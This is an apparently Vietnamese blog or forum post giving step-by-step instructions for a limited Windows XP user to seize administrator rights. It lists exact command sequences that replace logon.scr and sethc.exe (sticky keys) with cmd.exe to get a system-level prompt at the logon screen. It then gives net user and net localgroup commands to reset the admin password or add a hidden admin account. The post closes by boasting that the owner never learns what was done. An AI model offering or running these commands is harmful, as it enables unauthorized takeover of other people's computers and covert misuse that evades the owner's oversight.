Hack mật khẩu Admin trong Windows XP từ User thường

Bạn chỉ được truy cập vào máy tính với một quyền user thông thường và điều đó khiến bạn bị ''hãm tài'' mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Mình sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin mà không cần sử dụng tới một phần mềm nào cả. ( cách của mình ko áp dụng dc cho ổ đĩa NTFS)
Cách 1 nè:
Vào Start > Run gõ lệnh cmd(nhớ ấn ENTER 0 Cửa sổ lệnh sẽ được mở ra và nhập chính xác các câu lệnh sau:
cd\
cd\windows\system32
mkdir hackdir
copy logon.scr hackdir\logon.scr
copy cmd.exe hackdir\cmd.exe
del logon.scr
copy hackdir\cmd.exe logon.scr
exit
với các câu lệnh trên bạn đã tạo ra 1 flie mới và copy dc 2 file cốt yếu của administrator là logon.scr và cmd.exe vào thư mục trong acount limited
sau đó khởi động lại máy thôi
và kết quả là với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của tài khoản Admin trên máy. oh yeah

Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra.

Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau:

Cách 1: Đổi mật khẩu tài khoản Admin sẵn có

Tại cửa sổ lênh mọi người có thể sử dụng một trong các lệnh sau:

net user thay mật khẩu tài khoản quản trị bằng mật khẩu mới
hoặc

net user xóa trắng mật khẩu của tài khoản này

Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator thành 123.

Cách 2: Thêm một tài khoản mới với quyền Admin

Tại cửa sổ lệnh lần lượt gõ các lệnh sau:

net user /add thêm một tài khoản với tên và mật khẩu tương ứng
net localgroup Administrators /add đưa tài khoản vừa tạo vào nhóm quản trị

Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất. À mà quên, đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ thống của bạn hoạt động trở lại như bình thường.

1 cách nữa nè, nghe kĩ nha:
Vào Start / Run / notepad
@echo off
cls
cd %systemroot%/system32
ren sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y

---> bạn lưu file này với tên bất kì với phần mở rộng là : *.bat (ví dụ : hack.bat)

------------Quá trình test------------

+ Tại màn hình logon bạn thử nhấn shift 05 lần, nếu sau khi nhấn bạn thấy xuất hiện cửa sổ command prompt là thành công,

***Lưu ý : Khi ta chưa đăng nhập bất kì user nào, thì tại màn hình logon ta cho xuất hiện được của sổ command prompt, máy tính hiểu ta đang "đứng" tại user có quyền admin

+ Tới đây, với quyền admin thì bạn có thể làm được mọi thứ trên máy tính rồi phải không ?

1. Reset user bất kì bằng lệnh : net user [tên user] *
2. "Nâng cấp" user đang có quyền limited lên quyền admin bằng lệnh :"net localgroup"

Cú pháp : net localgroup [tên group] [tên user] /add

ví dụ : net localgroup administrators sieunhi /add

3.Tạo một user mới với quyền admin, đăng nhập user đó vào máy tính, làm những gì bạn muốn sau đó xóa hẳn user đó khỏi máy tính <------ cách này chủ nhân máy tính không hề biết bạn vào và làm những công việc gì trên máy tính đó hihi